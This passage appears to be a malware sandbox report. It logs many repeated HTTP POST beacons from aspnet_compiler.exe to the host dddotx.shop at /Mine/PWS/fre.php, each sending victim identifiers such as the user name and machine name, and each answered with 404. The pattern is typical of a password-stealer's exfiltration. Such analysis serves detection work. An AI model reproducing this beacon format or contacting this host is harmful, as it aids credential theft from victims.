                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  89192.168.2.455965188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:59.830913067 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:59.835834980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:00.558449030 CEST597INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8VVF%2FVxdUl%2FJj53OhNXtHf8Nt3cNyxbHEAFTZOF9XlbjCX5ce7%2FX66ES6DFsoi2xqCqllaDroTpEvWIxQdtwD13QcmGkK43Bh3xo9rNzXxRnvqStnxboROkHAw7Sqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dc77d3d41b4-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  90192.168.2.455966188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:00.711074114 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:00.716017962 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:01.627257109 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inOSrd7lx4eBh4mSH7pHRpmG6%2FnA%2B2ib%2F79XDDsArvENTJ0xyhnXTDuesn28GyKqKvbScADSuXudKGUEGc%2BKEf43jDGdnbMDwdFvaiz2xnGx8Rvo8jBYaV0w9iuRkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dcd1aea1a03-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  91192.168.2.455967188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:01.915862083 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:01.920768023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:02.596066952 CEST575INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNzKxb2UjThXAihmXlBuPbTBP%2FH3%2FOn%2BXm5M0v%2FVxTIaM%2FR0ZTwf0XVMF8jzqXqeBgk6uVyIZ8A5zvApYZ75Q3gAFbhTdqZ%2BWXyEu9ZyVHL7H93oDY%2FtoQaAtxEhMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dd4797a8c81-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  92192.168.2.455968188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:02.754868031 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:02.761282921 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:03.523556948 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ncYTqk%2FjINLzSoK9LvKxkZGM6Lw5HzdbedsrYuSjQdrORnrNnei6gCMYqx2c8D%2FL9jMFq8Kcr3tDbJ6qd4gounLmBQrnoAVaJuIuApw24PCJt05cxTIf%2FFCL080dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dd9dc237295-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  93192.168.2.455969188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:03.941581011 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:03.946516037 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:05.068569899 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=labFOlz3POAGK9xMitwT4rHu6BorhVrCYhSKMa023ZVtDDq18wwmtu50b2azJDP7D4mgtK0y5l1WVUUss7H3VAbLtKrDeCwQdtwAkNSiNAd6k8JSRLpVFrG%2FrmS1Cg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5de0b82642bb-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  94192.168.2.455970188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:05.220174074 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:05.226429939 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:06.054195881 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6ZfFuuqcbGJIy5myzTdPY3Z36geDybfSk01menpm5YBWWP6dqKHiJ0JhJvUtPoLERWJZLroIDKEKdo2w1ySh8aJhLCzHrFsQAsDgzHsC8q%2BFCOnJoC0RyLJ9nAxpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5de92ba16a5e-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  95192.168.2.455971188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:06.435375929 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:06.440248966 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:07.461065054 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5df0cee81a13-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:07.461170912 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5df0cee81a13-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  96192.168.2.455972188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:07.608885050 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:07.613698006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:08.369697094 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=57t49o0e5MadRYzEM7F5MPbiCyJcF%2FT6i2hbMxNVauazrjTeMgNsL%2Fa07Z64Aq72LAjvACx61F09oLPOP0wqkmQAIlarUsmSu%2FjzCOhvtFC%2Fc5IfRGVfoEup90AOfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5df81a928c53-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  97192.168.2.455973188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:08.515196085 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:08.520224094 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:09.181221962 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fK2RM5PWl1J5HxnKG0eWViQUWiYqlPr3UGl01tZMMi%2BBeNaCHsxH8nIaCWnvnZebEJ0iPXxL%2BIbI0Ng2EdezEIj6e9I8kza8JoKrC3lpff8dZXECN1tYLKO2MhGveQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dfdbe3042b8-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  98192.168.2.455974188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:09.332556009 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:09.339417934 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:10.051428080 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNHxEu56BqMc%2B0HauuSMY%2BuW%2FD0lLlQxpViBld4mgJxB72bgutf3qKqjcrqqUo83r6etEklbNPACNycFAh2LTNc%2BOpQqGA352yEetfU%2F8BAyoNhmnOCJqgAWVIprbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e02ee2f8ca7-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  99192.168.2.455975188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:10.215982914 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:10.220925093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:10.861635923 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XakXjrUnVeAgqmgC5%2FOfD75JRQ9z7QVKCf26saeaVseH2nnb2qiHcwPNG2zWWFacXWd%2FFHLh%2BZVZ2YGVvs2cvdAZU8PU5Ebe4LUFNOQIMJCtbGAVWkNz3ueQpq%2FL4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e085b457289-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  100192.168.2.455976188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:11.020920038 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:11.026164055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:12.048547983 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTYITKKHkauu3KDROcd%2BiPro8JhJ97YcMyYfM3aBEHHZOnkyh2FJVsu%2BwPvelkrGcWgVCVAkAhhnV73QV%2Fo1zdaM3dEumdtCer3J608Ib5jgiY3aLUlac2n1Sfpb3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e0d6bef0f39-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  101192.168.2.455977188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:12.213246107 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:12.218161106 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:12.921641111 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjMp8iH0DNwHyBAZQS6GAebhWVVFx44WQZ1vNyeLy00TDJwv2eSSXHptCQlsamiKOUUY80Qw1The5UPuAqbOR9VBT%2BMwGrQBWGXwOQfVWkVweU76GLO9nm%2FoiELqig%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e14dccf330c-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  102192.168.2.455978188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:13.167393923 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:13.173782110 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:13.838912010 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1PxUuy2BGXTEkxt9DC5snAPMQ6eOR2yLIr3ecQ%2FQlv2yHHOpP7kujSsPh1X9%2BZS6n9clX1%2FEJvy9LbsJUiIDhxq3hVoU%2BHoKV830jVOPhcl2UMqDSFbKOExq7Q8qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e1ae8327d1a-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  103192.168.2.455979188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:13.988409042 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
